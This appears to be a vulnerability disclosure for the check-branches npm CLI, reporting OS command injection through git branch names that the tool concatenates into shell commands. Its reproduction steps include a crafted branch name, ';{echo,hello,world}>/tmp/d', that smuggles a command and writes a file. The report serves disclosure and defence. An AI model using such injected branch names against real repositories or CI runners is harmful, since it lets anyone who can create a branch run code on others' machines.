check-branches describes itself as a "CLI to automatically check if your current repo branch has any conflicts with all other repo's branches. Really useful when working with big teams."
Resources:
- Project's GitHub source code: https://github.com/puntorigen/check-branches/
- Project's npm package: https://www.npmjs.com/package/check-branches
I'm reporting an OS Command Injection vulnerability in the check-branches npm package.
check-branches is a command-line tool, run locally or in CI, that confirms no merge conflicts exist between git branches.
However, the library follows two conventions that can be abused:
- It trusts branch names as they are (plain text)
- It spawns git commands by concatenating that input into a shell command string
Since a branch name is potentially user input (users can create branches remotely, via pull requests, or simply through privileged access to a repository), anyone who can create a branch can effectively run any command on the machine that runs check-branches.
- Install check-branches@0.0.19, which is the latest version:
    npm install -g check-branches
- Make sure there's a valid git repository with remotes configured and at least one valid branch created.
- Create a new git branch as follows (these characters are indeed valid in git branch names):
    git checkout -b ";{echo,hello,world}>/tmp/d"
- Run the check-branches program in the git project directory and observe output similar to:
    ❯ check-branches
    ********************************
    * check-branches CLI v0.0.19 *
    ********************************
    ✔ generating report
    Wow! Congratulations! Your current branch has no conflicts with any other liran-test-repo repo branches!
    time for 'check': 151ms
- Confirm that the file /tmp/d was created with the contents hello world in it.
Liran Tal